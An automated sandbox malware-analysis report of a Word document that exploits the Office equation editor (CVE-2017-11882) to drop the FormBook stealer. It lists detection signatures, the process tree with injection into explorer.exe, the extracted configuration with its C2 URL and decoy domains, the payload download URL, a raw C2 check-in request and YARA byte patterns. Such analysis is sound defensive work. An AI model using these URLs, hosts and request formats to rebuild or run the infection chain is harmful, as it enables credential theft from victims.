Play interactive tour

Edit tour

Windows Analysis Report OBL PN210700369.doc

Overview

General Information

Sample Name:	OBL PN210700369.doc
Analysis ID:	491424
MD5:	ee6900ee7f29ffb8b1c5f5b9a8a117d0
SHA1:	74501f04465f268c3f2bfea3b371118fe25b6aed
SHA256:	135dedf906bbb8eef7aef3b5966f1b933e65725cef80e653031481feb7351d62
Tags:	docFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Sigma detected: Droppers Exploiting CVE-2017-11882

System process connects to network (likely due to code injection or exploit)

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Modifies the prolog of user mode functions (user mode inline hooks)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Office equation editor drops PE file

Queues an APC in another process (thread injection)

.NET source code contains very large strings

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 196 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 800 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

obinnamaxdw2962.exe (PID: 2612 cmdline: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe MD5: CEE3C4065C5CB9237B7EBE5C1B3ECEA5)

obinnamaxdw2962.exe (PID: 2412 cmdline: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe MD5: CEE3C4065C5CB9237B7EBE5C1B3ECEA5)

explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

cmmon32.exe (PID: 2572 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: EA7BAAB0792C846DE451001FAE0FBD5F)

cmd.exe (PID: 2812 cmdline: /c del 'C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.vaughnmethod.com/ed9s/"], "decoy": ["pocketoptioniraq.com", "merabestsolutions.com", "atelectronics.site", "fuxueshi.net", "infinitystay.com", "forensicconcept.site", "txpmachine.com", "masterwhs.xyz", "dia-gnwsis.art", "fulltiltnodes.com", "bigbnbbsc.com", "formation-figma.com", "bonanacroin.net", "medicalmarijuanasatx.com", "bagnavy.com", "aaegiscares.net", "presentationpublicschool.com", "bestyousite.site", "prescriptionn.com", "beyondthenormbouquets.com", "sinclairsparkes.com", "yesterdayglass.com", "lj-safe-keepinganwgt76.xyz", "winlegends.com", "perthvideoproduction.com", "sgh.technology", "athletik.biz", "cardealergame.com", "ugkhmel.xyz", "4346emerald.com", "soulconstructionservices.com", "dalmac-nj.com", "marylink.net", "gentciu.com", "insidecity.company", "wensum-creations.com", "frontwonline.com", "8xovz.xyz", "pickaxecoffee.com", "stonezhang.top", "markmra1995.site", "valleysettlewash.top", "canadabulkmushrooms.com", "shiningoutdoors.com", "elysiarv.xyz", "artoidmode.com", "whileloading.com", "crgcatherine.com", "usa111.com", "tourmalinesepiapirole.info", "infodf.xyz", "girldollg.xyz", "paypal-caseid581.com", "bymetronet.com", "outranky.com", "bankinsurance.site", "iscinterconnectsolutions.com", "networth.fyi", "fastplaycdn.xyz", "fernradio.com", "sergeantrandom.net", "islamic-coins.com", "naplesgolfcartbatteries2u.com", "seniormedicarebenefits.net"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.426482026.00000000021D1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x6e1f0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6e46a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b610:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b88a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x79f9d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xa73bd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x79a89:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xa6ea9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x7a09f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xa74bf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7a217:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa7637:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x6ee82:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x9c2a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x78d04:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa6124:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x6fb7b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x9cf9b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x8020f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xad62f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x81212:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x7d131:$sqlite3step: 68 34 1C 7B E1 0x7d244:$sqlite3step: 68 34 1C 7B E1 0xaa551:$sqlite3step: 68 34 1C 7B E1 0xaa664:$sqlite3step: 68 34 1C 7B E1 0x7d160:$sqlite3text: 68 38 2A 90 C5 0x7d285:$sqlite3text: 68 38 2A 90 C5 0xaa580:$sqlite3text: 68 38 2A 90 C5 0xaa6a5:$sqlite3text: 68 38 2A 90 C5 0x7d173:$sqlite3blob: 68 53 D8 7F 8C 0x7d29b:$sqlite3blob: 68 53 D8 7F 8C 0xaa593:$sqlite3blob: 68 53 D8 7F 8C 0xaa6bb:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5849:$sqlite3step: 68 34 1C 7B E1 0x595c:$sqlite3step: 68 34 1C 7B E1 0x5878:$sqlite3text: 68 38 2A 90 C5 0x599d:$sqlite3text: 68 38 2A 90 C5 0x588b:$sqlite3blob: 68 53 D8 7F 8C 0x59b3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5849:$sqlite3step: 68 34 1C 7B E1 0x595c:$sqlite3step: 68 34 1C 7B E1 0x5878:$sqlite3text: 68 38 2A 90 C5 0x599d:$sqlite3text: 68 38 2A 90 C5 0x588b:$sqlite3blob: 68 53 D8 7F 8C 0x59b3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.426552817.0000000002233000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: obinnamaxdw2962.exe PID: 2612	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.obinnamaxdw2962.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.obinnamaxdw2962.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.obinnamaxdw2962.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
4.2.obinnamaxdw2962.exe.220ed1c.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 800, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 800, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obinnazx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe, CommandLine: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe, NewProcessName: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe, OriginalFileName: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 800, ProcessCommandLine: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe, ProcessId: 2612

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.vaughnmethod.com/ed9s/"], "decoy": ["pocketoptioniraq.com", "merabestsolutions.com", "atelectronics.site", "fuxueshi.net", "infinitystay.com", "forensicconcept.site", "txpmachine.com", "masterwhs.xyz", "dia-gnwsis.art", "fulltiltnodes.com", "bigbnbbsc.com", "formation-figma.com", "bonanacroin.net", "medicalmarijuanasatx.com", "bagnavy.com", "aaegiscares.net", "presentationpublicschool.com", "bestyousite.site", "prescriptionn.com", "beyondthenormbouquets.com", "sinclairsparkes.com", "yesterdayglass.com", "lj-safe-keepinganwgt76.xyz", "winlegends.com", "perthvideoproduction.com", "sgh.technology", "athletik.biz", "cardealergame.com", "ugkhmel.xyz", "4346emerald.com", "soulconstructionservices.com", "dalmac-nj.com", "marylink.net", "gentciu.com", "insidecity.company", "wensum-creations.com", "frontwonline.com", "8xovz.xyz", "pickaxecoffee.com", "stonezhang.top", "markmra1995.site", "valleysettlewash.top", "canadabulkmushrooms.com", "shiningoutdoors.com", "elysiarv.xyz", "artoidmode.com", "whileloading.com", "crgcatherine.com", "usa111.com", "tourmalinesepiapirole.info", "infodf.xyz", "girldollg.xyz", "paypal-caseid581.com", "bymetronet.com", "outranky.com", "bankinsurance.site", "iscinterconnectsolutions.com", "networth.fyi", "fastplaycdn.xyz", "fernradio.com", "sergeantrandom.net", "islamic-coins.com", "naplesgolfcartbatteries2u.com", "seniormedicarebenefits.net"]}

Multi AV Scanner detection for submitted file

Show sources

Source: OBL PN210700369.doc

ReversingLabs: Detection: 31%

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.obinnamaxdw2962.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.505046149.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682290111.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.504859779.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: http://lg-tv.tk/obinnazx.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obinnazx[1].exe	ReversingLabs: Detection: 17%
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	ReversingLabs: Detection: 17%

Source: 5.2.obinnamaxdw2962.exe.400000.1.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: cmmon32.pdb source: obinnamaxdw2962.exe, 00000005.00000002.504809742.0000000000030000.00000040.00020000.sdmp
Source:	Binary string: cmmon32.pdbr2v source: obinnamaxdw2962.exe, 00000005.00000002.504809742.0000000000030000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: obinnamaxdw2962.exe, cmmon32.exe

Source: global traffic

DNS query: name: lg-tv.tk

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 2.57.140.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 2.57.140.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 2.57.140.50:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.islamic-coins.com
Source: C:\Windows\explorer.exe	Network Connect: 2.57.140.50 80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.vaughnmethod.com/ed9s/

Source: Joe Sandbox View

ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK

Source: global traffic

HTTP traffic detected: GET /ed9s/?tXNH2v=aXG8CVn8ddSLaR&ydudnHn=k2ojovXzPk6QP2E57heACoDYW6OrA9sZh3WmhaFm9atosFE1d0WL15gHEPMcVErHBLYJUA== HTTP/1.1Host: www.islamic-coins.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 185.239.243.112 185.239.243.112

Source: global traffic

